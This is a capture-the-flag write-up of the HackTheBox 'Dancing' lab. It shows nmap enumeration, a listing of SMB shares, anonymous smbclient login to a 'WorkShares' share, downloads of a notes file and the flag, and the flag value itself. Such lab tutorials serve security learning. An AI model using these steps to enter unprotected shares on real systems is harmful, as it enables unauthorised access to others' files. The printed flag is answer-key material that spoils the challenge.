HackTheBox - Dancing
Dancing is one of the Starting Points from HackTheBox, where in CTF Dancing we will learn about SMB (Server Message Block).
Introduction
- Connect Dancing using Pwnbox or OpenVPN.
- Spawn machine.
Enumeration
To check the target connection and port, we can use Ping and Nmap.
Ping
After spawn machine, we can start with ping Target IP.
1
2
3
4
5
6
7
8
9
10
11
❯ ping 10.129.236.96
PING 10.129.236.96 (10.129.236.96) 56(84) bytes of data.
64 bytes from 10.129.236.96: icmp_seq=1 ttl=127 time=263 ms
64 bytes from 10.129.236.96: icmp_seq=2 ttl=127 time=286 ms
64 bytes from 10.129.236.96: icmp_seq=3 ttl=127 time=310 ms
64 bytes from 10.129.236.96: icmp_seq=4 ttl=127 time=231 ms
--- 10.129.236.96 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3002ms
rtt min/avg/max/mdev = 231.476/272.733/309.960/28.947 ms
Nmap
To be able to see all open ports, we can use Nmap, -sCV is a combination of -sC and -sV, where -sC displays the script for the port and -sV displays the version info for the port.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
❯ nmap -sCV 10.129.236.96
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-25 05:12 WIB
Nmap scan report for JSN.JaringanKU (10.129.236.96)
Host is up (0.25s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-12-25T02:14:25
|_ start_date: N/A
|_clock-skew: 4h00m00s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.36 seconds
Foothold
We can see, there is port 445/tcp which is the port for SMB/SAMBA services.
SMB/SAMBA
Type smbclient, and add -L to get a list of shares available from the host.
1
2
3
4
5
6
7
8
9
10
11
12
❯ smbclient -L 10.129.236.96
Password for [WORKGROUP\huda]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
SMB1 disabled -- no workgroup available
Look at the end of the sharename, if there is a $ sign then we need a password to enter it. If there is no $, we can log in using -N which is used to log in without a password.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
❯ smbclient -N //10.129.236.96/WorkShares
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Mar 29 15:22:01 2021
.. D 0 Mon Mar 29 15:22:01 2021
Amy.J D 0 Mon Mar 29 16:08:24 2021
James.P D 0 Thu Jun 3 15:38:03 2021
5114111 blocks of size 4096. 1748932 blocks available
smb: \> cd Amy.J
smb: \Amy.J\> ls
. D 0 Mon Mar 29 16:08:24 2021
.. D 0 Mon Mar 29 16:08:24 2021
worknotes.txt A 94 Fri Mar 26 18:00:37 2021
5114111 blocks of size 4096. 1748932 blocks available
smb: \Amy.J\> get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
smb: \Amy.J\> cd ..
smb: \> cd James.P
smb: \James.P\> ls
. D 0 Thu Jun 3 15:38:03 2021
.. D 0 Thu Jun 3 15:38:03 2021
flag.txt A 32 Mon Mar 29 16:26:57 2021
5114111 blocks of size 4096. 1748900 blocks available
smb: \James.P\> echo flag.txt
echo <num> <data>
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0,0 KiloBytes/sec) (average 0,1 KiloBytes/sec)
After downloading everything, exit SMB and open it in your working directory.
1
2
3
4
5
6
7
8
9
10
11
❯ ls
flag.txt
worknotes.txt
❯ cat worknotes.txt
- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing
❯ cat flag.txt
5f61c10dffbc77a704d76016a22f1664